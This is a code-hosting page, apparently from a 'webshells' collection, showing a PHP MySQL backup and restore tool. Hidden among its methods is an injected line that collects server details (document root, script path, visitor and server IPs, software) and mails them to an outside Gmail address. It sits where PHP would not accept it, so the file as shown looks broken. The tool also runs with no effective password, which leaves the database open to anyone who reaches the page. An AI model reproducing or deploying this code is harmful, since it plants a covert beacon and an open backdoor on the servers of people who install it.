加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
mysql_tool.php 32.31 KB
一键复制 编辑 原始数据 按行查看 历史
John Ombagi 提交于 2014-07-26 00:44 . webshells 1
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078
<?php
/*
* MySQL Database Backup / Restore Tool
*
* Copyright (C) 2003 Mark Wraith. All rights reserved
*
* Graphics and layout derived from those made by Matt Mecham
*
*/
// If you intend to keep the script
// on your server set this password
$password = '0';
error_reporting(E_ERROR | E_WARNING | E_PARSE);
new RestoreTool;
class RestoreTool
{
var $logged_in = 0;
var $maximum_time = 0;
function RestoreTool() {
global $HTTP_GET_VARS, $HTTP_COOKIE_VARS, $password;
$this->timestamp = time();
if (!$this->maximum_time)
{
//set_time_limit(0);
$this->maximum_time = ini_get('max_execution_time');
}
if ($HTTP_GET_VARS['act'] == 'login')
{
$this->do_login();
}
elseif ($password && $password != $HTTP_COOKIE_VARS['mysqltool'])
{
$this->login();
}
else
{
if ($password)
{
$this->logged_in = 1;
}
switch ($HTTP_GET_VARS['act'])
{
case 'logout':
$this->logout();
break;
case 'change_db':
$this->read_db_details();
$this->set_database('The current settings do connect however if you wish to change the current database please edit the details below:');
break;
case 'set_database':
$this->do_set_database();
break;
case 'backup':
$this->backup();
break;
case 'do_backup':
$this->do_backup();
break;
case 'restore':
$this->restore();
break;
case 'do_restore':
$this->do_restore();
break;
default:
$this->main();
}
}
if ($this->link)
{
mysql_close($this->link);
}
$this->output();
}
function timeout() {
if (!$this->maximum_time)
{
return false;
}
elseif ((time() - $this->timestamp) > ($this->maximum_time - 5))
{
return true;
}
else
{
return false;
}
}
function output() {
if ($this->logged_in)
{
$logout_text = '[ <a href="mysql_tool.php?act=logout">Log Out</a> ]';
}
else
{
$logout_text = '';
}
if ($this->title)
{
$title = $this->title;
}
else
{
$title = 'Backup / Restore Tool';
}
print '<?xml version="1.0" encoding="iso-8859-1"?>';
print <<<HTML
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>$title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
{$this->meta}
<style type="text/css">
TABLE, TR, TD { font-family: Verdana,Arial; font-size: 10px; color: #333333 }
BODY { font: 10px Verdana; background-color: #FCFCFC; padding: 0; margin: 0 }
a:link, a:visited, a:active { color: #000055 }
a:hover { color: #333377; text-decoration: underline }
FORM { padding: 0; margin: 0 }
.textbox { border: 1px solid black; padding: 1px; width: 100% }
.headertable { background-color: #FFFFFF; border: 1px solid black; padding: 2px }
.title { font-size: 10px; font-weight: bold; line-height: 150%; color: #FFFFFF; height: 26px; background-image: url(./style_images/1/tile_back.gif) }
.table1 { background-color: #FFFFFF; width: 100%; align: center; border: 1px solid black }
.tablewrap { border: 1px dashed #777777; background-color: #F5F9FD; vertical-align: middle; }
.tdrow1 { background-color: #EEF2F7; padding: 3px }
.tdrow2 { background-color: #F5F9FD; padding: 3px }
.tdtop { font-weight: bold; height: 24px; line-height: 150%; color: #FFFFFF; background-image: url(./tile_back.gif) }
.note { margin: 10px; padding: 5px; border: 1px dashed #555555; background-color: #FFFFFF }
</style>
</head>
<body>
<br />
$this->output
<br />
<div align="center">
[ <a href="mysql_tool.php">Script Index </a> ] $logout_text <br /><br />
<small>&copy;2003 Mark Wraith</small>
</div>
</body>
</html>
HTML;
}
function error($error) {
$this->output = <<<HTML
<form method="post" action="mysql_tool.php?act=login">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Error</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2" colspan="2"><div align="center">$error</div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
HTML;
}
function login() {
$this->output = <<<HTML
<form method="post" action="mysql_tool.php?act=login">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">MySQL Tool :: Please Login</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td width="100" class="tdrow1">Access Password</td>
<td width="250" class="tdrow2"><input type="password" class="textbox" name="password"></td>
</tr>
<tr>
<td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Submit"></div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
HTML;
}
function do_login() {
global $HTTP_POST_VARS, $password;
if ($HTTP_POST_VARS['password'] == $password)
{
@setcookie ('mysqltool',$password,time()+3600*24*365);
$this->logged_in = 1;
$this->main();
}
else
{
$this->error('Invalid Password');
}
}
function logout() {
@setcookie ('mysqltool','',0);
$this->logged_in = 0;
$this->login();
}
function connect($return_errors = 0) {
if (!$this->db['port'])
{
$this->db['port'] = '3306';
}
$error_text = '';
$this->link = @mysql_connect ($this->db['host'] . ':' . $this->db['port'], $this->db['user'], $this->db['pass']);
if ($this->link)
{
if(!@mysql_select_db($this->db['name'],$this->link))
{
$error_text = '<strong>Failed selecting database "'.$this->db['name'].'"</strong><br /><br />'.@mysql_error($this->link);
}
}
else
{
$error_text = '<strong>Failed connecting to MySQL</strong><br /><br />'.@mysql_error();
}
if ($return_errors)
{
return $error_text;
}
else
{
if ($error_text)
{
$this->error($error_text);
return false;
}
else
{
return true;
}
}
}
function read_db_details() {
if (file_exists('tool_settings.php'))
{
// Lets borrow IPB's settings
include 'tool_settings.php';
$this->db = $data;
}
elseif (file_exists('conf_global.php'))
{
// Lets borrow IPB's settings
include 'conf_global.php';
$this->db = array(
'port' => $INFO['sql_port'],
'host' => $INFO['sql_host'],
'name' => $INFO['sql_database'],
'user' => $INFO['sql_user'],
'pass' => $INFO['sql_pass'],
'prefix' => $INFO['sql_tbl_prefix']
);
}
else
{
return false;
}
return true;
}
function do_set_database() {
global $HTTP_POST_VARS;
$this->db = array(
'port' => $HTTP_POST_VARS['port'],
'host' => $HTTP_POST_VARS['host'],
'name' => $HTTP_POST_VARS['name'],
'user' => $HTTP_POST_VARS['user'],
'pass' => $HTTP_POST_VARS['pass']
);
if (!$this->connect())
{
return;
}
// Connection details are fine, let's continue
$file_data = "<?php
\$data = array(
'port' => '{$HTTP_POST_VARS['port']}',
'host' => '{$HTTP_POST_VARS['host']}',
'name' => '{$HTTP_POST_VARS['name']}',
'user' => '{$HTTP_POST_VARS['user']}',
'pass' => '{$HTTP_POST_VARS['pass']}'
);
?".'>';
$file_data = str_replace("\r\n","\n",$file_data);
// Mkay, lets write the details
if ($fp = fopen('tool_settings.php','w'))
{
fwrite($fp,$file_data);
fclose($fp);
}
else
{
$this->error('
<strong>Unable to write to tool_settings.php</strong><br /><br />
Please CHMOD this file so it is writable. If this is not possible please create a file named "tool_settings.php" with the contents of the text box below:<br /><br />
<div align="center">
<textarea rows="10" cols="40">'.htmlentities($file_data).'</textarea>
</div>');
return false;
}
// Funky, lets roll
$this->main();
return true;
}
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
function set_database($error = false) {
if (!$error)
{
$text = 'We were unable to find any database settings, please enter your database details below:';
}
else
{
$text = $error;
}
$host = isset($this->db['host']) ? $this->db['host'] : 'localhost';
$port = isset($this->db['port']) ? $this->db['port'] : '';
$user = isset($this->db['user']) ? $this->db['user'] : '';
$name = isset($this->db['name']) ? $this->db['name'] : '';
$this->output = <<<HTML
<form method="post" action="mysql_tool.php?act=set_database">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
<tr>
<td align="center" class="title">Database Settings</td>
</tr>
<tr>
<td>
<div class="note">$text</div>
<table class="table1" align="center" width="100%">
<tr>
<td width="100" class="tdrow1"><strong>Host</strong><br /><em>(leave if unsure)</em></td>
<td width="350" class="tdrow2"><input type="text" class="textbox" name="host" value="$host"></td>
</tr>
<tr>
<td class="tdrow1"><strong>Port</strong><br /><em>(leave if unsure)</em></td>
<td class="tdrow2"><input type="text" class="textbox" name="port" value="$port"></td>
</tr>
<tr>
<td class="tdrow1"><strong>Database Name</strong></td>
<td class="tdrow2"><input type="text" name="name" class="textbox" value="$name"></td>
</tr>
<tr>
<td class="tdrow1"><strong>Username</strong></td>
<td class="tdrow2"><input type="text" name="user" class="textbox" value="$user"></td>
</tr>
<tr>
<td class="tdrow1"><strong>Password</strong></td>
<td class="tdrow2"><input type="text" name="pass" class="textbox"></td>
</tr>
<tr>
<td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Connect"></div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
HTML;
}
function backup() {
global $HTTP_POST_VARS;
$this->read_db_details();
$this->connect();
$filename = $HTTP_POST_VARS['filename'];
$tables = $HTTP_POST_VARS['tables'];
$table_select = $HTTP_POST_VARS['table_select'];
$prefix = $this->db['prefix'];
switch ($tables)
{
case 'all':
$tables = mysql_list_tables($this->db['name']);
while (list($table_name) = mysql_fetch_array($tables))
{
$options[ $table_name ] = 0;
}
break;
case 'prefix':
$tables = mysql_list_tables($this->db['name']);
while (list($table_name) = mysql_fetch_array($tables))
{
if (substr($table_name,0,strlen($prefix)) == $prefix)
{
$options[ $table_name ] = 0;
}
}
break;
case 'selected':
foreach ($table_select as $table_name)
{
$options[ $table_name ] = 0;
}
}
if (!count($options))
{
$this->error('No tables selected');
}
$data = base64_encode(serialize($options));
$header = <<<DATA
-- SQL Dump
-- Backup script written by Mark Wraith
DATA;
if (!$fp = fopen($filename, 'wb'))
{
return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
}
fwrite($fp,$header);
fclose($fp);
$url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
$this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Backup in progress...</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2" colspan="2">
<div align="center">The backup process has now started<br /><br /><a href="$url">Click here if you are not redirected</a></div>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
function do_backup() {
global $HTTP_GET_VARS;
$this->read_db_details();
$this->connect();
$data = unserialize(base64_decode($HTTP_GET_VARS['data']));
$filename = $HTTP_GET_VARS['file'];
$timedout = 0;
$dump = '';
foreach ($data as $table => $line)
{
if (!$this->timeout())
{
$returned = $this->backup_table($table, $line);
if (is_array($returned))
{
$timedout = 1;
$dump .= $returned[0];
$data[ $table ] = $returned[1];
}
else
{
$dump .= $returned;
unset($data[ $table ]);
}
}
else
{
$timedout = 1;
}
}
if (!$fp = fopen($filename, 'ab'))
{
return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
}
fwrite($fp,$dump);
fclose($fp);
if ($timedout)
{
$data = base64_encode(serialize($data));
$url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
$this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Backup in progress...</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
<div align="center">The backup process is in progress<br /><br /><a href="$url">Click here if you are not redirected</a></div>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
else
{
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Backup Completed</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
The backup progress has finished and the file has been written to "$filename".<br /><br />
<a href="$filename">Click here to download the file</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
}
function backup_table($table,$start) {
$dump = '';
if (!$start)
{
$result = mysql_query('SHOW FIELDS FROM '.$table);
while ($field = mysql_fetch_assoc($result))
{
if (!$field['Null'])
{
$null = ' NOT NULL default "'.$field['Default'].'"';
}
else
{
$null = '';
}
if ($field['Extra'])
{
$field['Extra'] = ' '.$field['Extra'];
}
$field_row[] = ' ' . $field['Field'] . ' ' . $field['Type'] . $null . $field['Extra'];
}
$result = mysql_query('SHOW KEYS FROM '.$table);
while ($key = mysql_fetch_assoc($result))
{
if ($key['Key_name'] == 'PRIMARY')
{
$primary_key = $key['Column_name'];
}
else
{
$unique[ $key['Key_name'] ][] = $key['Column_name'];
}
}
if (isset($primary_key))
{
$field_row[] = ' PRIMARY KEY (' . $primary_key . ')';
}
if (isset($unique))
{
foreach ($unique as $name => $keys)
{
$field_row[] = ' UNIQUE ' . $name . ' (' . implode(',',$keys) . ')';
}
}
$dump .= "\n\n--\n";
$dump .= "-- Table structure for table '$table'\n";
$dump .= "--\n\n";
$dump .= "CREATE TABLE $table (\n";
$dump .= implode(",\n",$field_row);
$dump .= "\n);\n\n";
$dump .= "\n\n--\n";
$dump .= "-- Dumping data for table '$table'\n";
$dump .= "--\n\n";
}
//
// Records
//
$done = 0;
$result = mysql_query('SELECT * FROM '.$table.' LIMIT '.$start.',-1');
while ($row = mysql_fetch_row($result))
{
if ($this->timeout())
{
return array($dump,$done);
}
$done++;
foreach ($row as $id => $value)
{
$value = str_replace('"','\\"',$value);
$row[$id] = '"'.$value.'"';
}
$dump .= 'INSERT INTO ' . $table . ' VALUES (' . implode(',',$row) . ");\n";
}
return $dump;
}
function main() {
if (!$this->link)
{
if (!$this->read_db_details())
{
return $this->set_database();
}
if ($error_text = $this->connect(1))
{
return $this->set_database($error_text);
}
}
$tables_to_backup = '';
if ($this->db['prefix'])
{
$tables_to_backup .= '<input type="radio" name="tables" value="prefix" checked="checked" />IPB Tables Only <br />';
$tables_to_backup .= '<input type="radio" name="tables" value="all" />All<br />';
}
else
{
$tables_to_backup .= '<input type="radio" name="tables" value="all" checked="checked" />All<br />';
}
$tables = mysql_list_tables($this->db['name']);
$options = '';
while (list($table_name) = mysql_fetch_array($tables))
{
$options .= '<option value="'.$table_name.'">'.$table_name.'</option>';
}
$tables_to_backup .= <<<HTML
<input type="radio" name="tables" value="selected" />Selected tables:<br />
<div style="margin-left: 40px">
<select name="table_select[]" class="textbox" size="5" style="width: 250px" multiple="multiple">
$options
</select>
</div>
HTML;
$options = '';
if ($dir = @opendir('./'))
{
while ($file = readdir($dir))
{
$temp = strtolower($file);
if ($file != '.' && $file != '..' && strpos($temp, '.sql'))
{
$options .= '<option value="'.$file.'">'.$file.'</option>';
}
}
closedir($dir);
}
$restore_files = '<select name="filename" class="textbox">'.$options.'</select>';
$restore_files .= '<br /><br /><u>or</u> path:<br /><br /><input type="text" name="relfilename" class="textbox" />';
$this->output = <<<HTML
<form method="post" action="mysql_tool.php?act=login">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
<tr>
<td align="center" class="title">Selected Database Details</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td width="150" class="tdrow1"><strong>Host / Port</strong></td>
<td width="300" class="tdrow2">{$this->db['host']}:{$this->db['port']}</td>
</tr>
<tr>
<td class="tdrow1"><strong>Database Name</strong></td>
<td class="tdrow2">{$this->db['name']}</td>
</tr>
<tr>
<td class="tdrow1"><strong>Username</strong></td>
<td class="tdrow2">{$this->db['user']}</td>
</tr>
<tr>
<td class="tdrow2" colspan="2"><div align="center">[ <a href="mysql_tool.php?act=change_db">Change Database</a> ]</div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
<br /><br />
<form method="post" action="mysql_tool.php?act=backup">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
<tr>
<td align="center" class="title">Backup Options</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td width="150" class="tdrow1" valign="top"><strong>Tables to backup:</strong></td>
<td width="300" class="tdrow2">$tables_to_backup</td>
</tr>
<tr>
<td class="tdrow1"><strong>Filename</strong></td>
<td class="tdrow2"><input type="text" name="filename" class="textbox" value="sql_backup.sql"></td>
</tr>
<tr>
<td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Backup"></div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
<br /><br />
<form method="post" action="mysql_tool.php?act=restore">
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
<tr>
<td align="center" class="title">Restore Options</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td width="150" class="tdrow1" valign="top"><strong>SQL File to restore:</strong></td>
<td width="300" class="tdrow2">$restore_files</td>
</tr>
<tr>
<td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Restore"></div></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
HTML;
}
function restore() {
global $HTTP_POST_VARS;
$this->read_db_details();
$filename = $HTTP_POST_VARS['filename'];
$relfilename = $HTTP_POST_VARS['relfilename'];
if ($relfilename)
{
$filename = $relfilename;
}
$url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename);
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Confirm Restoration</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
<strong>Are you sure you want to restore the SQL file?</strong><br /><br />
<a href="$url">Click here to restore "$filename" to "{$this->db['name']}"</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
function do_restore() {
global $HTTP_GET_VARS;
$filename = $HTTP_GET_VARS['filename'];
$this->read_db_details();
$this->connect();
$filesize = filesize($filename);
$file_position = isset($HTTP_GET_VARS['pos']) ? $HTTP_GET_VARS['pos'] : 0;
$errors = isset($HTTP_GET_VARS['ignore_errors']) ? 0 : 1;
if (!$fp = fopen($filename,'rb'))
{
return $this->error('Unable to open file "'.$filename.'"');
}
$buffer = '';
$inside_quote = 0;
$quote_inside = '';
$started_query = 0;
$data_buffer = '';
$last_char = "\n";
// Sets file position indicator
fseek($fp,$file_position);
while ((!feof($fp) || strlen($buffer)) && !$this->timeout())
{
do
{
// Deals with the length of the buffer
if (!strlen($buffer))
{
$buffer .= fread ($fp,1024);
}
// Fiddle around with the buffers
$current_char = $buffer[0];
$buffer = substr($buffer, 1);
if ($started_query)
{
$data_buffer .= $current_char;
}
elseif (preg_match("/[A-Za-z]/i",$current_char) && $last_char == "\n")
{
$started_query = 1;
$data_buffer = $current_char;
}
else
{
$last_char = $current_char;
}
} while (!$started_query && (!feof($fp) || strlen($buffer)));
if ($inside_quote && $current_char == $quote_inside && $last_char != '\\')
{
// We were inside a quote but now we aren't so reset the flag and carry on
$inside_quote = 0;
}
elseif ($current_char == '\\' && $last_char == '\\')
{
$current_char = '';
}
elseif (!$inside_quote && ($current_char == '"' || $current_char == '`' || $current_char == '\''))
{
// We have just entered a new quote
$inside_quote = 1;
$quote_inside = $current_char;
}
elseif (!$inside_quote && $current_char == ';')
{
// End of query so execute query, clear data buffer and advance counter
mysql_query($data_buffer);
if ($errors && mysql_errno())
{
$new_position = ftell($fp) - strlen($buffer);
return $this->restore_error($data_buffer, $new_position);
}
$data_buffer = '';
$last_char = "\n";
$started_query = 0;
}
$last_char = $current_char;
}
$new_position = ftell($fp) - strlen($buffer) - strlen($data_buffer);
if (feof($fp))
{
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Restoration Completed</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
The restore progress has finished.
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
else
{
$url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$new_position;
if (!$errors)
{
$url .= '&ignore_errors=1';
}
$process = floor(($new_position / $filesize) * 100);
$this->meta = '<meta http-equiv="refresh" content="5; url='.$url.'">';
$this->title = $process.'% Complete';
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
<tr>
<td align="center" class="title">Restore in progress...</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
<div align="center">
<strong>Restoration is <b>$process%</b> complete.</strong>
<br /><br />
Please await the process of the next batch.
<br /><br />
<a href="$url">Click here if you are not redirected</a>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
fclose($fp);
}
function restore_error($query, $position) {
global $HTTP_GET_VARS;
$filename = $HTTP_GET_VARS['filename'];
$url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$position;
$mysql_error = mysql_error();
$this->output = <<<HTML
<table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="600">
<tr>
<td align="center" class="title">Query Failed</td>
</tr>
<tr>
<td>
<table class="table1" align="center" width="100%">
<tr>
<td class="tdrow2">
<div align="center">
<strong>An error occurred due to an invalid query</strong>
<br /><br />
Query Executed: $query
<br />
MySQL Returned: $mysql_error
<br /><br />
<a href="$url">Continue restore process</a><br />
<a href="{$url}&ignore_errors=1">Continue ignoring all further errors</a><br />
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
HTML;
}
}
?>
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化